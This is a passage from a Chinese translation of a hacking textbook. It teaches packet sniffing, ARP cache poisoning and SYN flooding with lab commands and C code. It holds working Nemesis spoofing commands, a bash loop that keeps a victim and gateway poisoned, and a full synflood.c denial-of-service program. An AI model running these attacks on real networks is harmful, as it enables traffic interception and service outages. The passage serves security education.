[ Source: 00:01:29:15:65:b6     Dest: 00:01:6c:eb:1d:50 Type: 8 ]
        ((  Layer 3 ::: IP Header  ))
        ( Source: 192.168.42.1  Dest: 192.168.42.249 )
        ( Type: 6       ID: 7755        Length: 61 )
                {{  Layer 4 :::: TCP Header  }}
                { Src Port: 35602       Dest Port: 7890 }
                { Seq #: 2887045274     Ack #: 3843058889 }
                { Header Size: 32       Flags: PUSH ACK  }
                        9 bytes of packet data
74 65 73 74 69 6e 67 0d 0a                      | testing..
==== Got a 66 byte packet ====
[[  Layer 2 :: Ethernet Header  ]]
[ Source: 00:01:6c:eb:1d:50     Dest: 00:01:29:15:65:b6 Type: 8 ]
        ((  Layer 3 ::: IP Header  ))
        ( Source: 192.168.42.249        Dest: 192.168.42.1 )
        ( Type: 6       ID: 15678       Length: 52 )
                {{  Layer 4 :::: TCP Header  }}
                { Src Port: 7890        Dest Port: 35602 }
                { Seq #: 3843058889     Ack #: 2887045283 }
                { Header Size: 32       Flags: ACK  }
                        No Packet Data
==== Got a 82 byte packet ====
[[  Layer 2 :: Ethernet Header  ]]
[ Source: 00:01:29:15:65:b6     Dest: 00:01:6c:eb:1d:50 Type: 8 ]
        ((  Layer 3 ::: IP Header  ))
        ( Source: 192.168.42.1  Dest: 192.168.42.249 )
        ( Type: 6       ID: 7756        Length: 68 )
                {{  Layer 4 :::: TCP Header  }}
                { Src Port: 35602       Dest Port: 7890 }
                { Seq #: 2887045283     Ack #: 3843058889 }
                { Header Size: 32       Flags: PUSH ACK  }
                        16 bytes of packet data
74 68 69 73 20 69 73 20 61 20 74 65 73 74 0d 0a | this is a test..
reader@hacking:~/booksrc $

解码头部并将它们分离成层后，TCP/IP 连接就更容易理解了。注意哪些 IP 地址与哪些 MAC 地址相关联。还要注意，从 192.168.42.1（第一个和最后一个数据包）的两个数据包中的序列号增加了九，因为第一个数据包包含九个字节的实际数据：2887045283 – 2887045274 = 9。这是 TCP 协议用来确保所有数据按顺序到达的，因为数据包可能会因为各种原因而延迟。

尽管数据包头部内置了所有这些机制，但数据包仍然对同一网络段上的任何人可见。FTP、POP3 和 telnet 等协议在传输数据时不进行加密。即使没有 dsniff 等工具的帮助，攻击者也很容易在网络嗅探中找到这些数据包中的用户名和密码，并利用它们来破坏其他系统。从安全角度来看，这并不太好，因此更智能的交换机提供了交换网络环境。

激活嗅探

在一个交换网络环境中，数据包只会发送到它们的目的端口，根据它们的 MAC 地址。这需要更智能的硬件来创建和维护一个将 MAC 地址与特定端口关联的表格，具体取决于连接到每个端口的设备，如图所示。

交换环境的优势在于，设备只会接收到为其发送的数据包，因此混杂设备无法嗅探任何额外的数据包。但在交换环境中，也有巧妙的方法来嗅探其他设备的数据包；它们只是稍微复杂一些。为了找到这些黑客技巧，必须检查协议的细节，并将它们结合起来。

网络通信的一个重要方面是可以用来产生有趣效果的源地址。这些协议中没有规定确保数据包中的源地址确实是源机器的地址。在数据包中伪造源地址的行为被称为欺骗。将欺骗添加到你的技巧包中大大增加了可能的黑客攻击数量，因为大多数系统都期望源地址是有效的。

图 0x400-7。

欺骗是交换网络中嗅探数据包的第一步。其他两个有趣的细节可以在 ARP 中找到。首先，当一个带有已存在于 ARP 缓存中的 IP 地址的 ARP 回复到来时，接收系统将用回复中找到的新信息覆盖先前的 MAC 地址信息（除非该 ARP 缓存条目被明确标记为永久）。其次，不保留 ARP 流量的状态信息，因为这需要额外的内存，并且会复杂化一个旨在简单的协议。这意味着系统会接受 ARP 回复，即使它们没有发送 ARP 请求。

这三个细节，如果被正确利用，允许攻击者使用一种称为ARP 重定向的技术来嗅探交换网络上的网络流量。攻击者向某些设备发送伪造的 ARP 回复，导致 ARP 缓存条目被攻击者的数据覆盖。这种技术被称为ARP 缓存中毒。为了嗅探两点之间的网络流量，即A和B，攻击者需要中毒A的 ARP 缓存，使A相信B的 IP 地址在攻击者的 MAC 地址上，同时也需要中毒B的 ARP 缓存，使B相信A的 IP 地址也在攻击者的 MAC 地址上。然后攻击者的机器只需将这些数据包转发到它们适当的最终目的地。之后，所有A和B之间的流量仍然被传递，但都流经攻击者的机器，如图所示。

图 0x400-8。

由于A和B根据它们各自的 ARP 缓存在自己的数据包上封装自己的以太网头部，因此A发往B的 IP 流量实际上被发送到攻击者的 MAC 地址，反之亦然。交换机仅根据 MAC 地址过滤流量，因此交换机将按设计工作，将A和B发往攻击者 MAC 地址的 IP 流量发送到攻击者的端口。然后攻击者将 IP 数据包重新封装到适当的以太网头部，并将它们发送回交换机，最终将它们路由到正确的目的地。交换机工作正常；被欺骗的是受害机器，它们被诱导通过攻击者的机器重定向流量。

由于超时值，受害机器将定期发送真实的 ARP 请求并接收真实的 ARP 回复作为响应。为了维持重定向攻击，攻击者必须保持受害机器的 ARP 缓存中毒。一种简单的方法是以恒定的间隔向 A 和 B 发送伪造的 ARP 回复——例如，每 10 秒一次。

网关是一个将本地网络的所有流量路由到互联网的系统。当受害机器之一是默认网关时，ARP 重定向特别有趣，因为默认网关和另一个系统之间的流量是该系统的互联网流量。例如，如果 192.168.0.118 的机器通过交换机与 192.168.0.1 的网关通信，流量将受到 MAC 地址的限制。这意味着这种流量在混杂模式下通常无法被嗅探。为了嗅探这种流量，它必须被重定向。

要重定向流量，首先需要确定 192.168.0.118 和 192.168.0.1 的 MAC 地址。这可以通过 ping 这些主机来完成，因为任何 IP 连接尝试都会使用 ARP。如果你运行一个嗅探器，你可以看到 ARP 通信，但操作系统会缓存结果的 IP/MAC 地址关联。

reader@hacking:~/booksrc $ ping -c 1 -w 1 192.168.0.1
PING 192.168.0.1 (192.168.0.1): 56 octets data
64 octets from 192.168.0.1: icmp_seq=0 ttl=64 time=0.4 ms
--- 192.168.0.1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.4/0.4/0.4 ms
reader@hacking:~/booksrc $ ping -c 1 -w 1 192.168.0.118
PING 192.168.0.118 (192.168.0.118): 56 octets data
64 octets from 192.168.0.118: icmp_seq=0 ttl=128 time=0.4 ms
--- 192.168.0.118 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.4/0.4/0.4 ms
reader@hacking:~/booksrc $ arp -na
? (192.168.0.1) at 00:50:18:00:0F:01 [ether] on eth0
? (192.168.0.118) at 00:C0:F0:79:3D:30 [ether] on eth0
reader@hacking:~/booksrc $ ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 00:00:AD:D1:C7:ED
          inet addr:192.168.0.193  Bcast:192.168.0.255  Mask:255.255.255.0
          UP BROADCAST NOTRAILERS RUNNING  MTU:1500  Metric:1
          RX packets:4153 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3875 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:601686 (587.5 Kb)  TX bytes:288567 (281.8 Kb)
          Interrupt:9 Base address:0xc000 
reader@hacking:~/booksrc $

在 ping 之后，192.168.0.118 和 192.168.0.1 的 MAC 地址都出现在攻击者的 ARP 缓存中。这样，数据包在被重定向到攻击者机器后可以到达最终目的地。假设 IP 转发功能已编译到内核中，我们只需要定期发送一些欺骗的 ARP 响应。192.168.0.118 需要知道 192.168.0.1 在 00:00:AD:D1:C7:ED，而 192.168.0.1 需要知道 192.168.0.118 也在 00:00:AD:D1:C7:ED。这些欺骗的 ARP 数据包可以使用名为 Nemesis 的命令行数据包注入工具注入。Nemesis 最初是由 Mark Grimes 编写的工具套件，但在最新版本 1.4 中，所有功能都被新的维护者和开发者 Jeff Nathan 合并到一个单一的工具中。Nemesis 的源代码位于 LiveCD 的 /usr/src/nemesis-1.4/ 目录下，并且已经编译并安装。

reader@hacking:~/booksrc $ nemesis

NEMESIS -=- The NEMESIS Project Version 1.4 (Build 26)

NEMESIS Usage:
  nemesis [mode] [options]

NEMESIS modes:
  arp
  dns
  ethernet
  icmp
  igmp
  ip
  ospf (currently non-functional)
  rip
  tcp
  udp

NEMESIS options: 
  To display options, specify a mode with the option "help".

reader@hacking:~/booksrc $ nemesis arp help

ARP/RARP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)

ARP/RARP Usage:
  arp [-v (verbose)] [options]

ARP/RARP Options: 
  -S <Source IP address>
  -D <Destination IP address>
  -h <Sender MAC address within ARP frame>
  -m <Target MAC address within ARP frame>
  -s <Solaris style ARP requests with target hardware addess set to broadcast>
  -r ({ARP,RARP} REPLY enable)
  -R (RARP enable)
  -P <Payload file>

Data Link Options: 
  -d <Ethernet device name>
  -H <Source MAC address>
  -M <Destination MAC address>

You must define a Source and Destination IP address.

reader@hacking:~/booksrc $ sudo nemesis arp -v -r -d eth0 -S 192.168.0.1 -D
192.168.0.118 -h 00:00:AD:D1:C7:ED -m 00:C0:F0:79:3D:30 -H 00:00:AD:D1:C7:ED -
M 00:C0:F0:79:3D:30

ARP/RARP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)

               [MAC] 00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30
     [Ethernet type] ARP (0x0806)

  [Protocol addr:IP] 192.168.0.1 > 192.168.0.118
 [Hardware addr:MAC] 00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30
        [ARP opcode] Reply
  [ARP hardware fmt] Ethernet (1)
  [ARP proto format] IP (0x0800)
  [ARP protocol len] 6
  [ARP hardware len] 4

Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB

ARP Packet Injected
reader@hacking:~/booksrc $ sudo nemesis arp -v -r -d eth0 -S 192.168.0.118 -D 
192.168.0.1 -h  00:00:AD:D1:C7:ED -m 00:50:18:00:0F:01 -H 00:00:AD:D1:C7:ED -M 
00:50:18:00:0F:01

ARP/RARP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)

               [MAC] 00:00:AD:D1:C7:ED > 00:50:18:00:0F:01
     [Ethernet type] ARP (0x0806)

  [Protocol addr:IP] 192.168.0.118 > 192.168.0.1
 [Hardware addr:MAC] 00:00:AD:D1:C7:ED > 00:50:18:00:0F:01
        [ARP opcode] Reply
  [ARP hardware fmt] Ethernet (1)
  [ARP proto format] IP (0x0800)
  [ARP protocol len] 6
  [ARP hardware len] 4

Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB.

ARP Packet Injected 
reader@hacking:~/booksrc $

这两个命令从 192.168.0.1 到 192.168.0.118 以及相反方向欺骗 ARP 响应，都声称它们的 MAC 地址是攻击者的 MAC 地址 00:00:AD:D1:C7:ED。如果这些命令每 10 秒重复一次，这些虚假的 ARP 响应将继续使 ARP 缓存中毒并重定向流量。标准的 BASH shell 允许使用熟悉的控制流语句进行命令脚本化。下面使用了一个简单的 BASH shell while 循环来无限循环，每 10 秒发送我们的两个中毒 ARP 响应。

reader@hacking:~/booksrc $ while true
> do
> sudo nemesis arp -v -r -d eth0 -S 192.168.0.1 -D 192.168.0.118 -h
00:00:AD:D1:C7:ED -m 00:C0:F0:79:3D:30 -H 00:00:AD:D1:C7:ED -M 
00:C0:F0:79:3D:30
> sudo nemesis arp -v -r -d eth0 -S 192.168.0.118 -D 192.168.0.1 -h 
00:00:AD:D1:C7:ED -m 00:50:18:00:0F:01 -H 00:00:AD:D1:C7:ED -M 
00:50:18:00:0F:01
> echo "Redirecting..."
> sleep 10
> done

ARP/RARP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)

               [MAC] 00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30
     [Ethernet type] ARP (0x0806)

  [Protocol addr:IP] 192.168.0.1 > 192.168.0.118
 [Hardware addr:MAC] 00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30
        [ARP opcode] Reply
  [ARP hardware fmt] Ethernet (1)
  [ARP proto format] IP (0x0800)
  [ARP protocol len] 6
  [ARP hardware len] 4
Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB.

ARP Packet Injected

ARP/RARP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)

               [MAC] 00:00:AD:D1:C7:ED > 00:50:18:00:0F:01
     [Ethernet type] ARP (0x0806)

  [Protocol addr:IP] 192.168.0.118 > 192.168.0.1
 [Hardware addr:MAC] 00:00:AD:D1:C7:ED > 00:50:18:00:0F:01
        [ARP opcode] Reply
  [ARP hardware fmt] Ethernet (1)
  [ARP proto format] IP (0x0800)
  [ARP protocol len] 6
  [ARP hardware len] 4
Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB.
ARP Packet Injected 
Redirecting...

你可以看到，像 Nemesis 和标准的 BASH shell 这样简单的东西可以用来快速组合网络攻击。Nemesis 使用一个名为 libnet 的 C 库来制作欺骗数据包并将其注入。类似于 libpcap，这个库使用原始套接字，并通过标准接口平衡不同平台之间的不一致性。libnet 还提供了一些方便的网络数据包处理函数，例如生成校验和。

libnet 库提供了一个简单且统一的 API 来制作和注入网络数据包。它有很好的文档记录，函数名具有描述性。从 Nemesis 的源代码中可以高屋建瓴地看到，使用 libnet 制作 ARP 数据包是多么容易。下面的 nemesis_arp() 函数在 nemesis.c 中被调用，用于构建和注入一个 ARP 数据包。

来自 nemesis-arp.c

static ETHERhdr etherhdr;
`static ARPhdr arphdr;`

...

void nemesis_arp(int argc, char **argv)
{
    const char *module= "ARP/RARP Packet Injection";

    nemesis_maketitle(title, module, version);

    if (argc > 1 && !strncmp(argv[1], "help", 4))
        arp_usage(argv[0]);

    `arp_initdata();     arp_cmdline(argc, argv);     arp_validatedata();     arp_verbose();`

    if (got_payload)
    {
        if (builddatafromfile(ARPBUFFSIZE, &pd, (const char *)file,
                    (const u_int32_t)PAYLOADMODE) < 0)
            arp_exit(1);
    }

    `if (buildarp(&etherhdr, &arphdr, &pd, device, reply) < 0)     {         printf("\n%s Injection Failure\n", (rarp == 0 ? "ARP" : "RARP"));         arp_exit(1);     }     else     {         printf("\n%s Packet Injected\n", (rarp == 0 ? "ARP" : "RARP"));         arp_exit(0);     }` 
}

结构 ETHERhdr 和 ARPhdr 在文件 nemesis.h 中（如下所示）被定义为现有 libnet 数据结构的别名。在 C 语言中，typedef 用于用符号别名一个数据类型。

来自 nemesis.h

typedef struct libnet_arp_hdr ARPhdr;
typedef struct libnet_as_lsa_hdr ASLSAhdr;
typedef struct libnet_auth_hdr AUTHhdr;
typedef struct libnet_dbd_hdr DBDhdr;
typedef struct libnet_dns_hdr DNShdr;
`typedef struct libnet_ethernet_hdr ETHERhdr;`
typedef struct libnet_icmp_hdr ICMPhdr;
typedef struct libnet_igmp_hdr IGMPhdr; 
typedef struct libnet_ip_hdr IPhdr;

nemesis_arp() 函数调用此文件中的其他一系列函数：arp_initdata(), arp_cmdline(), arp_validatedata() 和 arp_verbose()。你可能猜得到，这些函数分别用于初始化数据、处理命令行参数、验证数据和进行某种形式的详细报告。arp_initdata() 函数正是如此，它在静态声明的数据结构中初始化值。

下面展示的 arp_initdata() 函数，将头部结构中的各个元素设置为适合 ARP 数据包的适当值。

从 nemesis-arp.c

static void arp_initdata(void)
{
    /* defaults */
    etherhdr.ether_type = ETHERTYPE_ARP;  /* Ethernet type ARP */
    memset(etherhdr.ether_shost, 0, 6);   /* Ethernet source address */
    memset(etherhdr.ether_dhost, 0xff, 6); /* Ethernet destination address */
    arphdr.ar_op = ARPOP_REQUEST;         /* ARP opcode: request */
    arphdr.ar_hrd = ARPHRD_ETHER;         /* hardware format: Ethernet */
    arphdr.ar_pro = ETHERTYPE_IP;         /* protocol format: IP */
    arphdr.ar_hln = 6;                    /* 6 byte hardware addresses */
    arphdr.ar_pln = 4;                    /* 4 byte protocol addresses */
    memset(arphdr.ar_sha, 0, 6);          /* ARP frame sender address */
    memset(arphdr.ar_spa, 0, 4);           /* ARP sender protocol (IP) addr */
    memset(arphdr.ar_tha, 0, 6);          /* ARP frame target address */
    memset(arphdr.ar_tpa, 0, 4);          /* ARP target protocol (IP) addr */
    pd.file_mem = NULL;
    pd.file_s = 0;
    return;
}

最后，nemesis_arp() 函数通过指向头部数据结构的指针调用 buildarp() 函数。从 buildarp() 的返回值在这里的处理方式来看，buildarp() 构建数据包并注入它。这个函数位于另一个源文件，即 nemesis-proto_arp.c。

从 nemesis-proto_arp.c

int buildarp(ETHERhdr *eth, ARPhdr *arp, FileData *pd, char *device,
        int reply)
{
    int n = 0;
    u_int32_t arp_packetlen;
    static u_int8_t *pkt;
    struct libnet_link_int *l2 = NULL;

    /* validation tests */

    if (pd->file_mem == NULL)
        pd->file_s = 0;

    arp_packetlen = LIBNET_ARP_H + LIBNET_ETH_H + pd->file_s;

#ifdef DEBUG
    printf("DEBUG: ARP packet length %u.\n", arp_packetlen);
    printf("DEBUG: ARP payload size  %u.\n", pd->file_s);
#endif

    if ((l2 = `libnet_open_link_interface(device, errbuf)` ) == NULL)
    {
        nemesis_device_failure(INJECTION_LINK, (const char *)device);
        return -1;
    }

    if `(libnet_init_packet(arp_packetlen, &pkt)`  == -1)
    {
        fprintf(stderr, "ERROR: Unable to allocate packet memory.\n");
        return -1;
    }

    `libnet_build_ethernet(eth->ether_dhost, eth->ether_shost, eth->ether_type,             NULL, 0, pkt);      libnet_build_arp(arp->ar_hrd, arp->ar_pro, arp->ar_hln, arp->ar_pln,             arp->ar_op, arp->ar_sha, arp->ar_spa, arp->ar_tha, arp->ar_tpa,             pd->file_mem, pd->file_s, pkt + LIBNET_ETH_H);      n = libnet_write_link_layer(l2, device, pkt, LIBNET_ETH_H +                 LIBNET_ARP_H + pd->file_s);`

    if (verbose == 2)
        nemesis_hexdump(pkt, arp_packetlen, HEX_ASCII_DECODE);
    if (verbose == 3)
        nemesis_hexdump(pkt, arp_packetlen, HEX_RAW_DECODE);

    if (n != arp_packetlen)
    {
        fprintf(stderr, "ERROR: Incomplete packet injection.  Only "
                "wrote %d bytes.\n", n);
    }
    else
    {
        if (verbose)
        {
            if (memcmp(eth->ether_dhost, (void *)&one, 6))
            {
                printf("Wrote %d byte unicast ARP request packet through "
                        "linktype %s.\n", n,
                        nemesis_lookup_linktype(l2->linktype));
            }
            else
            {
                printf("Wrote %d byte %s packet through linktype %s.\n", n,

                        (eth->ether_type == ETHERTYPE_ARP ? "ARP" : "RARP"),
                        nemesis_lookup_linktype(l2->linktype));
            }
        }
    }

    `libnet_destroy_packet(&pkt);`
    if (l2 != NULL)
        `libnet_close_link_interface(l2);`
    return (n);
}

从高层次来看，这个函数应该对你来说是可读的。使用 libnet 函数，它打开一个链路接口并为数据包初始化内存。然后，它使用以太网头部数据结构中的元素构建以太网层，然后对 ARP 层做同样的操作。接下来，它将数据包写入设备以注入它，最后通过销毁数据包和关闭接口来清理。下面展示了这些函数的手册页文档，以供参考。

从 libnet 手册页

`libnet_open_link_interface()` opens a low-level packet interface. This is 
required to write link layer frames. Supplied is a u_char pointer to the
interface device name and a u_char pointer to an error buffer. Returned is a
filled in libnet_link_int struct or NULL on error.

`libnet_init_packet()` initializes a packet for use. If the size parameter is
omitted (or negative) the library will pick a reasonable value for the user
(currently LIBNET_MAX_PACKET). If the memory allocation is successful, the
memory is zeroed and the function returns 1\. If there is an error, the
function returns -1\. Since this function calls malloc, you certainly should,
at some point, make a corresponding call to destroy_packet().

`libnet_build_ethernet()` constructs an ethernet packet. Supplied is the
destination  address, source address (as arrays of unsigned characterbytes)
and the ethernet frame type, a pointer to an optional data  payload, the
payload  length, and a pointer to a pre-allocated block of memory for the
packet. The ethernet packet type should be one  of the following:

Value               Type
ETHERTYPE_PUP       PUP protocol
ETHERTYPE_IP        IP protocol
ETHERTYPE_ARP       ARP protocol
ETHERTYPE_REVARP    Reverse ARP protocol
ETHERTYPE_VLAN      IEEE VLAN tagging
ETHERTYPE_LOOPBACK  Used to test interfaces

`libnet_build_arp()` constructs an ARP (Address Resolution Protocol) packet.
Supplied are the following: hardware address type, protocol address type, the
hardware address length, the protocol address length, the ARP packet type, the
sender hardware address, the sender protocol address, the target hardware
address, the target protocol address, the packet payload, the payload size,
and finally, a pointer to the packet header memory. Note that this function

only builds ethernet/IP ARP packets, and consequently the first value should
be ARPHRD_ETHER. The ARP packet type should be one of the following:
ARPOP_REQUEST, ARPOP_REPLY, ARPOP_REVREQUEST, ARPOP_REVREPLY,
ARPOP_INVREQUEST, or ARPOP_INVREPLY.

`libnet_destroy_packet()` frees the memory associated with the packet.

`libnet_close_link_interface()` closes an opened low-level packet interface.
Returned is 1 upon success or -1 on error.

在具备基本的 C 语言、API 文档和常识的基础上，你可以通过检查开源项目自学。例如，Dug Song 提供了一个名为 arpspoof 的程序，包含在 dsniff 中，该程序执行 ARP 重定向攻击。

从 arpspoof 手册页

NAME
       arpspoof - intercept packets on a switched LAN

SYNOPSIS
       arpspoof [-i interface] [-t target] host

DESCRIPTION
       arpspoof redirects packets from a target host (or all hosts) on the LAN
       intended for another host on the LAN by forging ARP replies. This is
       an extremely effective way of sniffing traffic on a switch.

       Kernel IP forwarding (or a userland program which accomplishes the
       same, e.g. fragrouter(8)) must be turned on ahead of time.

OPTIONS
       -i interface
              Specify the interface to use.

       -t target
              Specify a particular host to ARP poison (if not  specified, all
              hosts on the LAN).

       host   Specify  the host you wish to intercept packets for (usually the
              local gateway).

SEE ALSO
       dsniff(8), fragrouter(8)

AUTHOR 
       Dug Song <dugsong@monkey.org>

这个程序的魅力来自于其 arp_send() 函数，该函数也使用 libnet 来伪造数据包。由于许多之前解释过的 libnet 函数被使用（以下用粗体标出），所以这个函数的源代码应该对你来说是可读的。使用结构和错误缓冲区也应该很熟悉。

arpspoof.c

static struct libnet_link_int *llif;
static struct ether_addr spoof_mac, target_mac;
static in_addr_t spoof_ip, target_ip;

...

int
arp_send(struct libnet_link_int *llif, char *dev,
     int op, u_char *sha, in_addr_t spa, u_char *tha, in_addr_t tpa)
{
    char ebuf[128];
    u_char pkt[60];

    if (sha == NULL &&
        (sha = (u_char *)libnet_get_hwaddr(llif, dev, ebuf)) == NULL) {
        return (-1);
    }
    if (spa == 0) {
        if ((spa = libnet_get_ipaddr(llif, dev, ebuf)) == 0)
            return (-1);
        spa = htonl(spa); /* XXX */
    }
    if (tha == NULL)
        tha = "\xff\xff\xff\xff\xff\xff";

    `libnet_build_ethernet(tha, sha, ETHERTYPE_ARP, NULL, 0, pkt);      libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4,              op, sha, (u_char *)&spa, tha, (u_char *)&tpa,              NULL, 0, pkt + ETH_H);`

    fprintf(stderr, "%s ",
        ether_ntoa((struct ether_addr *)sha));

    if (op == ARPOP_REQUEST) {
        fprintf(stderr, "%s 0806 42: arp who-has %s tell %s\n",
            ether_ntoa((struct ether_addr *)tha),
            libnet_host_lookup(tpa, 0),
            libnet_host_lookup(spa, 0));
    }
    else {
        fprintf(stderr, "%s 0806 42: arp reply %s is-at ",
            ether_ntoa((struct ether_addr *)tha),
            libnet_host_lookup(spa, 0));
        fprintf(stderr, "%s\n",
            ether_ntoa((struct ether_addr *)sha));
    }
    return (`libnet_write_link_layer(llif, dev, pkt, sizeof(pkt)) == sizeof(pkt));`
}

剩余的 libnet 函数用于获取硬件地址、获取 IP 地址和查找主机。这些函数具有描述性的名称，并在 libnet 手册页上有详细的解释。

从 libnet 手册页

`libnet_get_hwaddr()` takes a pointer to a link layer interface struct, a
pointer to the network device name, and an empty buffer to be used in case of
error. The function returns the MAC address of the specified interface upon
success or 0 upon error (and errbuf will contain a reason).

`libnet_get_ipaddr()` takes a pointer to a link layer interface struct, a
pointer to the network device name, and an empty buffer to be used in case of
error. Upon success the function returns the IP address of the specified
interface in host-byte order or 0 upon error (and errbuf will contain a
reason).

`libnet_host_lookup()` converts the supplied network-ordered (big-endian) IPv4
address into its human-readable counterpart. If use_name is 1,
libnet_host_lookup() will attempt to resolve this IP address and return a
hostname, otherwise (or if the lookup fails), the function returns a dotted-
decimal ASCII string.

一旦你学会了如何阅读 C 代码，现有的程序可以通过示例教你很多。像 libnet 和 libpcap 这样的编程库有大量的文档，解释了所有你可能无法仅从源代码中推断出的细节。这里的目的是教你如何从源代码中学习，而不是仅仅教你如何使用几个库。毕竟，还有很多其他的库和大量使用它们的现有源代码。

拒绝服务

网络攻击中最简单的一种形式是拒绝服务（DoS）攻击。与试图窃取信息不同，DoS 攻击只是阻止对服务或资源的访问。DoS 攻击有两种一般形式：导致服务崩溃的和导致服务拥塞的。

导致服务崩溃的拒绝服务攻击实际上与程序漏洞利用比基于网络的漏洞利用更相似。通常，这些攻击依赖于特定供应商的糟糕实现。一个错误的缓冲区溢出漏洞利用通常只会使目标程序崩溃，而不是将执行流程导向注入的 shellcode。如果这个程序恰好在服务器上运行，那么在它崩溃后，其他人将无法访问该服务器。这种崩溃的 DoS 攻击与某个特定程序和版本紧密相关。由于操作系统处理网络堆栈，这段代码的崩溃将使内核崩溃，导致整个机器的服务被拒绝。许多这些漏洞在现代操作系统上早已被修补，但思考这些技术如何应用于不同情况仍然是有用的。

SYN 洪水

SYN 洪水试图耗尽 TCP/IP 堆栈中的状态。由于 TCP 维护“可靠”的连接，每个连接都需要在某个地方进行跟踪。内核中的 TCP/IP 堆栈处理这项工作，但它有一个有限的表，只能跟踪这么多传入的连接。SYN 洪水利用了这一限制。

攻击者使用伪造的不存在的源地址向受害者的系统发送大量的 SYN 数据包。由于 SYN 数据包用于初始化 TCP 连接，受害者的机器将向伪造的地址发送一个 SYN/ACK 数据包作为响应，并等待预期的 ACK 响应。每个这些等待的半开连接都会进入一个有限空间的回退队列。由于伪造的源地址实际上并不存在，因此从队列中删除这些条目并完成连接所需的 ACK 响应永远不会到来。相反，每个半开连接必须超时，这需要相对较长的时间。

只要攻击者继续向受害者的系统发送伪造的 SYN 数据包，受害者的回退队列就会保持满载，这使得真正的 SYN 数据包几乎无法到达系统并初始化有效的 TCP/IP 连接。

以 Nemesis 和 arpspoof 的源代码为参考，你应该能够编写一个执行这种攻击的程序。下面的示例程序使用了从源代码中提取的 libnet 函数和之前解释过的套接字函数。Nemesis 源代码使用 libnet_get_prand() 函数来获取用于各种 IP 字段的伪随机数。libnet_seed_prand() 函数用于初始化随机数生成器。以下类似地使用了这些函数。

synflood.c

#include <libnet.h>

#define FLOOD_DELAY 5000 // Delay between packet injects by 5000 ms.

/* Returns an IP in x.x.x.x notation */
char *print_ip(u_long *ip_addr_ptr) {
   return inet_ntoa( *((struct in_addr *)ip_addr_ptr) );
}

int main(int argc, char *argv[]) {
   u_long dest_ip;
   u_short dest_port;
   u_char errbuf[LIBNET_ERRBUF_SIZE], *packet;
   int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H;

   if(argc < 3)
   {
      printf("Usage:\n%s\t <target host> <target port>\n", argv[0]);
      exit(1);
   }

   dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // The host
   dest_port = (u_short) atoi(argv[2]); // The port

   network = libnet_open_raw_sock(IPPROTO_RAW); // Open network interface. 
   if (network == -1)
      libnet_error(LIBNET_ERR_FATAL, "can't open network interface.  -- this program
 must run
as root.\n");
   libnet_init_packet(packet_size, &packet); // Allocate memory for packet. 
   if (packet == NULL)
      libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n");

   libnet_seed_prand(); // Seed the random number generator.

   printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip));
   while(1) // loop forever (until break by CTRL-C)
   {
      libnet_build_ip(LIBNET_TCP_H,      // Size of the packet sans IP header.
         IPTOS_LOWDELAY,                 // IP tos
         libnet_get_prand(LIBNET_PRu16), // IP ID (randomized)
         0,                              // Frag stuff
         libnet_get_prand(LIBNET_PR8),   // TTL (randomized)
         IPPROTO_TCP,                    // Transport protocol
         libnet_get_prand(LIBNET_PRu32), // Source IP (randomized)
         dest_ip,                        // Destination IP
         NULL,                           // Payload (none)
         0,                              // Payload length
         packet);                        // Packet header memory

      libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // Source TCP port (random)
         dest_port,                      // Destination TCP port
         libnet_get_prand(LIBNET_PRu32), // Sequence number (randomized)
         libnet_get_prand(LIBNET_PRu32), // Acknowledgement number (randomized)
         TH_SYN,                         // Control flags (SYN flag set only)
         libnet_get_prand(LIBNET_PRu16), // Window size (randomized)
         0,                              // Urgent pointer
         NULL,                           // Payload (none)
         0,                              // Payload length
         packet + LIBNET_IP_H);          // Packet header memory

      if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
         libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");

      byte_count = libnet_write_ip(network, packet, packet_size); // Inject packet.
      if (byte_count < packet_size)
         libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written.  (%d of %d
bytes)", byte_count, packet_size);

      usleep(FLOOD_DELAY); // Wait for FLOOD_DELAY milliseconds.
   }

   libnet_destroy_packet(&packet); // Free packet memory.

   if (libnet_close_raw_sock(network) == -1) // Close the network interface.

      libnet_error(LIBNET_ERR_WARNING, "can't close network interface.");

   return 0;
}

这个程序使用一个 print_ip() 函数来处理将 libnet 存储 IP 地址所用的 u_long 类型转换为 inet_ntoa() 所期望的 struct 类型。值本身并没有改变——类型转换只是为了让编译器满意。

libnet 的当前版本是 1.1，与 libnet 1.0 不兼容。然而，Nemesis 和 arpspoof 仍然依赖于 libnet 的 1.0 版本，因此这个版本包含在 LiveCD 中，这也是我们将在我们的 synflood 程序中使用的版本。与使用 libpcap 编译类似，使用 libnet 编译时，使用标志 -lnet。然而，这并不是足够的信息供编译器使用，如下面的输出所示。

reader@hacking:~/booksrc $ gcc -o synflood synflood.c -lnet
In file included from synflood.c:1:
/usr/include/libnet.h:87:2: #error "byte order has not been specified, you'll"
synflood.c:6: error: syntax error before string constant
reader@hacking:~/booksrc $

